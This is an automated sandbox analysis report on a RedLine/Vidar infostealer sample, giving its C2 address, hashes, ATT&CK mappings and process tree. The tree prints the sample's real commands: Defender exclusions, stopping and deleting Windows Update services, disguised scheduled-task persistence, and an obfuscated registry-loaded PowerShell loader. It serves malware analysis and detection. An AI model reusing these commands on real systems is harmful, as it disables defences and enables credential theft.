redline | 6c56b6a178c64adef96a65fab45b58a7378b17262420a31addd0ec239e12e7c7

Analysis

max time kernel
135s
max time network
147s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
25/10/2022, 04:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe
Size

225KB
MD5

9ca30053b4e8d0e1f2bdddea854b8ae7
SHA1

148065f0c8b937734311ed60c7e7bb3566eefad7
SHA256

6c56b6a178c64adef96a65fab45b58a7378b17262420a31addd0ec239e12e7c7
SHA512

bf4e4d6b2748e9be0b4adffc221d0a60a78cbf710fa07b760cfa906fd86a9243bbab1d092d881cb0d4f60c73df03886c1f09dc85643c3ee3031858249fdd8d7f
SSDEEP

6144:tKRwiHSp+vV2TD862+2VahI7GDO569dOX:0Rw0MD8zGDeUOX

Score

10^/10

redline vidar 1707 @cryptoelephant88 evasion infostealer spyware stealer upx

Malware Config

Extracted

Family

redline

Botnet

@cryptoelephant88

77.73.134.24:80

Attributes

auth_value
db02fb4d25cd314ee038d62ab376241d

Extracted

Family

vidar

Version

55.2

Botnet

1707

https://t.me/slivetalks

https://c.im/@xinibin420

Attributes

profile_id
1707

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral1/memory/968-56-0x0000000000090000-0x00000000000B8000-memory.dmp	family_redline
behavioral1/memory/968-61-0x00000000000B21FE-mapping.dmp	family_redline
behavioral1/memory/968-63-0x0000000000090000-0x00000000000B8000-memory.dmp	family_redline
behavioral1/memory/968-62-0x0000000000090000-0x00000000000B8000-memory.dmp	family_redline

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Downloads MZ/PE file

Executes dropped EXE 5 IoCs

pid	Process
768	ofg.exe
2016	test.exe
9280	brave.exe
32608	chrome.exe
60968	svcupdater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000012752-78.dat	upx
behavioral1/files/0x0007000000012752-80.dat	upx
behavioral1/memory/9280-87-0x000000013FAF0000-0x000000013FFB1000-memory.dmp	upx
behavioral1/memory/9280-111-0x000000013FAF0000-0x000000013FFB1000-memory.dmp	upx
behavioral1/files/0x0007000000012752-167.dat	upx
behavioral1/memory/9280-171-0x000000013FAF0000-0x000000013FFB1000-memory.dmp	upx
behavioral1/files/0x0008000000013445-182.dat	upx
behavioral1/files/0x0008000000013445-184.dat	upx
behavioral1/memory/61772-193-0x000000013FBB0000-0x0000000140071000-memory.dmp	upx

Loads dropped DLL 18 IoCs

pid	Process
968	AppLaunch.exe
968	AppLaunch.exe
968	AppLaunch.exe
968	AppLaunch.exe
968	AppLaunch.exe
968	AppLaunch.exe
55800	WerFault.exe
55800	WerFault.exe
55800	WerFault.exe
55800	WerFault.exe
55800	WerFault.exe
61040	WerFault.exe
61040	WerFault.exe
61040	WerFault.exe
61040	WerFault.exe
61040	WerFault.exe
61040	WerFault.exe
61040	WerFault.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1376 set thread context of 968	1376	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	28
PID 2016 set thread context of 60952	2016	test.exe	50
PID 9280 set thread context of 61544	9280	brave.exe	74

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	brave.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\GoogleUpdate.exe	chrome.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
60840	sc.exe
60844	sc.exe
60784	sc.exe
61128	sc.exe
60872	sc.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
55800	32608	WerFault.exe	38
61040	2016	WerFault.exe	35

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1932	schtasks.exe
47236	SCHTASKS.exe
54420	SCHTASKS.exe
61464	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
62284	timeout.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
968	AppLaunch.exe
968	AppLaunch.exe
968	AppLaunch.exe
968	AppLaunch.exe
60748	powershell.exe
60920	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	968	AppLaunch.exe
Token: SeDebugPrivilege	768	ofg.exe
Token: SeDebugPrivilege	60748	powershell.exe
Token: SeDebugPrivilege	60968	svcupdater.exe
Token: SeShutdownPrivilege	60812	powercfg.exe
Token: SeShutdownPrivilege	60796	powercfg.exe
Token: SeDebugPrivilege	60920	powershell.exe
Token: SeShutdownPrivilege	60812	powercfg.exe
Token: SeShutdownPrivilege	60844	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1376 wrote to memory of 968	1376	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	28
PID 1376 wrote to memory of 968	1376	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	28
PID 1376 wrote to memory of 968	1376	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	28
PID 1376 wrote to memory of 968	1376	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	28
PID 1376 wrote to memory of 968	1376	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	28
PID 1376 wrote to memory of 968	1376	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	28
PID 1376 wrote to memory of 968	1376	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	28
PID 1376 wrote to memory of 968	1376	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	28
PID 1376 wrote to memory of 968	1376	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	28
PID 968 wrote to memory of 768	968	AppLaunch.exe	31
PID 968 wrote to memory of 768	968	AppLaunch.exe	31
PID 968 wrote to memory of 768	968	AppLaunch.exe	31
PID 968 wrote to memory of 768	968	AppLaunch.exe	31
PID 768 wrote to memory of 580	768	ofg.exe	32
PID 768 wrote to memory of 580	768	ofg.exe	32
PID 768 wrote to memory of 580	768	ofg.exe	32
PID 580 wrote to memory of 1932	580	cmd.exe	34
PID 580 wrote to memory of 1932	580	cmd.exe	34
PID 580 wrote to memory of 1932	580	cmd.exe	34
PID 968 wrote to memory of 2016	968	AppLaunch.exe	35
PID 968 wrote to memory of 2016	968	AppLaunch.exe	35
PID 968 wrote to memory of 2016	968	AppLaunch.exe	35
PID 968 wrote to memory of 2016	968	AppLaunch.exe	35
PID 968 wrote to memory of 2016	968	AppLaunch.exe	35
PID 968 wrote to memory of 2016	968	AppLaunch.exe	35
PID 968 wrote to memory of 2016	968	AppLaunch.exe	35
PID 968 wrote to memory of 9280	968	AppLaunch.exe	37
PID 968 wrote to memory of 9280	968	AppLaunch.exe	37
PID 968 wrote to memory of 9280	968	AppLaunch.exe	37
PID 968 wrote to memory of 9280	968	AppLaunch.exe	37
PID 968 wrote to memory of 32608	968	AppLaunch.exe	38
PID 968 wrote to memory of 32608	968	AppLaunch.exe	38
PID 968 wrote to memory of 32608	968	AppLaunch.exe	38
PID 968 wrote to memory of 32608	968	AppLaunch.exe	38
PID 968 wrote to memory of 32608	968	AppLaunch.exe	38
PID 968 wrote to memory of 32608	968	AppLaunch.exe	38
PID 968 wrote to memory of 32608	968	AppLaunch.exe	38
PID 32608 wrote to memory of 46592	32608	chrome.exe	39
PID 32608 wrote to memory of 46592	32608	chrome.exe	39
PID 32608 wrote to memory of 46592	32608	chrome.exe	39
PID 32608 wrote to memory of 46592	32608	chrome.exe	39
PID 32608 wrote to memory of 46592	32608	chrome.exe	39
PID 32608 wrote to memory of 46592	32608	chrome.exe	39
PID 32608 wrote to memory of 46592	32608	chrome.exe	39
PID 32608 wrote to memory of 47236	32608	chrome.exe	41
PID 32608 wrote to memory of 47236	32608	chrome.exe	41
PID 32608 wrote to memory of 47236	32608	chrome.exe	41
PID 32608 wrote to memory of 47236	32608	chrome.exe	41
PID 32608 wrote to memory of 47236	32608	chrome.exe	41
PID 32608 wrote to memory of 47236	32608	chrome.exe	41
PID 32608 wrote to memory of 47236	32608	chrome.exe	41
PID 32608 wrote to memory of 54420	32608	chrome.exe	43
PID 32608 wrote to memory of 54420	32608	chrome.exe	43
PID 32608 wrote to memory of 54420	32608	chrome.exe	43
PID 32608 wrote to memory of 54420	32608	chrome.exe	43
PID 32608 wrote to memory of 54420	32608	chrome.exe	43
PID 32608 wrote to memory of 54420	32608	chrome.exe	43
PID 32608 wrote to memory of 54420	32608	chrome.exe	43
PID 32608 wrote to memory of 55800	32608	chrome.exe	45
PID 32608 wrote to memory of 55800	32608	chrome.exe	45
PID 32608 wrote to memory of 55800	32608	chrome.exe	45
PID 32608 wrote to memory of 55800	32608	chrome.exe	45
PID 32608 wrote to memory of 55800	32608	chrome.exe	45
PID 32608 wrote to memory of 55800	32608	chrome.exe	45

C:\Users\Admin\AppData\Local\Temp\6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe
"C:\Users\Admin\AppData\Local\Temp\6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1376
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:968
- - C:\Users\Admin\AppData\Local\Microsoft\ofg.exe
    "C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\system32\cmd.exe
      "cmd.exe" /C schtasks /create /tn \o5jbkg8hsq /tr "C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:580
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn \o5jbkg8hsq /tr "C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        5⤵
        Creates scheduled task(s)
        
        PID:1932
- - C:\Users\Admin\AppData\Local\Microsoft\test.exe
    "C:\Users\Admin\AppData\Local\Microsoft\test.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2016
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:60952
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" & exit
        5⤵
        
        PID:62100
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        6⤵
        Delays execution with timeout.exe
        
        PID:62284
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 59896
      4⤵
      Loads dropped DLL
      Program crash
      PID:61040
- - C:\Users\Admin\AppData\Local\Microsoft\brave.exe
    "C:\Users\Admin\AppData\Local\Microsoft\brave.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    PID:9280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:60748
  - - C:\Windows\system32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      PID:61096
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:60840
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:60844
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:60784
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:61128
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:60872
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:60784
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:61452
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:61480
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:61492
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:61508
  - - C:\Windows\system32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      PID:61112
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        
        PID:60812
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:60796
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:60812
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:60844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:60920
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
        5⤵
        Creates scheduled task(s)
        
        PID:61464
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Drops file in Windows directory
      PID:61544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
      4⤵
      PID:61556
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        5⤵
        
        PID:61676
- - C:\Users\Admin\AppData\Local\Microsoft\chrome.exe
    "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:32608
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      PID:46592
  - - C:\Windows\SysWOW64\SCHTASKS.exe
      SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:47236
  - - C:\Windows\SysWOW64\SCHTASKS.exe
      SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:54420
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 32608 -s 212
      4⤵
      Loads dropped DLL
      Program crash
      PID:55800

C:\Windows\system32\taskeng.exe
taskeng.exe {3C4C680E-4B40-496D-BDA3-E6E67015CA47} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
PID:60900
- C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe
  C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:60968

C:\Windows\system32\taskeng.exe
taskeng.exe {E5739AA8-6E01-4BB1-9C89-9670EB37E488} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:61700
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  PID:61772
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  PID:61796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  PID:61828

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{30181613-2e80-443b-a68c-6e28ab7e294f}
1⤵
PID:61968

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
3.2MB

MD5
ae58e8058ae55a3dd3eefccb4a48be78

SHA1
09fc0b2194e8b8b5d690650057805b8966305f3e

SHA256
0af01618c8b68b42870b2fa8b0ee79ce961a3199cd8c006c7d1e770abb93030c

SHA512
fadcacb167576455ee3a1ac8e45d34c5d8aeb428490eb14572ecb8580622f5b4d82d46a9823ec0b6e7e0a4637749f8ffc35525ac7068f2236f358c353a447c99

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
60KB

MD5
d15aaa7c9be910a9898260767e2490e1

SHA1
2090c53f8d9fc3fbdbafd3a1e4dc25520eb74388

SHA256
f8ebaaf487cba0c81a17c8cd680bdd2dd8e90d2114ecc54844cffc0cc647848e

SHA512
7e1c1a683914b961b5cc2fe5e4ae288b60bab43bfaa21ce4972772aa0589615c19f57e672e1d93e50a7ed7b76fbd2f1b421089dcaed277120b93f8e91b18af94

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1174fba1a23d039ca28aed9b45dc418c

SHA1
3bcfe4ee36cf233e20144a82b7114cefb9c5e9f6

SHA256
fe7328bd8fd26fbf6509fe7011759e8d978903841364038ca93cb9a099a5f2c5

SHA512
ae2918fe37adef67d8add805693f8cf13fbc32a3f7aea3dfa93fe9a98adf466a89221a524d079a18997f9dba42f80f1a0091865929fe17bdc57f1b08d05afaac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\brave.exe

Filesize
3.2MB

MD5
872358b05cc08ca705a1a7592c23ecdf

SHA1
388dd6811a9459a2dbc78bdf38ef0477ca5b0704

SHA256
054174b77c43d2b1a97a1238282818dc2792535ec0e3b94102c58d9d9ffeba15

SHA512
bd12b7d87a172b1efeb1cf2bcf47d1594bb953dc6ac8bdce650f5d58ce818e74e5f90d82c7e4cfa9b39126cc6bc1323c1ba2f8f02b6be13f385ae524f0ac6e2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\brave.exe

Filesize
3.2MB

MD5
872358b05cc08ca705a1a7592c23ecdf

SHA1
388dd6811a9459a2dbc78bdf38ef0477ca5b0704

SHA256
054174b77c43d2b1a97a1238282818dc2792535ec0e3b94102c58d9d9ffeba15

SHA512
bd12b7d87a172b1efeb1cf2bcf47d1594bb953dc6ac8bdce650f5d58ce818e74e5f90d82c7e4cfa9b39126cc6bc1323c1ba2f8f02b6be13f385ae524f0ac6e2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ofg.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ofg.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
23b38ab78e0b006f338dc9b53f7483a6

SHA1
9f3bbff2d05fe1f43a2164fb87588d155bf12e0f

SHA256
5ebbaa3c071e76bd195ebf8a6cecc33944f222a919732a32b29d89ba654ca10a

SHA512
b20cf37049a328e45139f4d46c775c53fb3d7d78be2da0964fb81392a8bdace85557031cc7f8cffaa00bf57fc6d18750240693d9cb0da5e7eccfcff4b4188e04

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
23b38ab78e0b006f338dc9b53f7483a6

SHA1
9f3bbff2d05fe1f43a2164fb87588d155bf12e0f

SHA256
5ebbaa3c071e76bd195ebf8a6cecc33944f222a919732a32b29d89ba654ca10a

SHA512
b20cf37049a328e45139f4d46c775c53fb3d7d78be2da0964fb81392a8bdace85557031cc7f8cffaa00bf57fc6d18750240693d9cb0da5e7eccfcff4b4188e04

Download Submit
C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
ef412c79fe946bc2afa8f1adfd734d1a

SHA1
5fb96b86f1cbf84c9a9556dc435cc334097767f0

SHA256
0b93be5a8be37ba42f5ea5fdc86de25238429c4ddd4e8202d64406c9d11e7721

SHA512
c69df9f909b146e15b1608bc7295a6e3a38f180fdc0914c730fd09991e9ff82ed132f94846536a7111cc14a87faee24896a5588a255f18e4ccf5d9340d715da7

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
3.2MB

MD5
ae58e8058ae55a3dd3eefccb4a48be78

SHA1
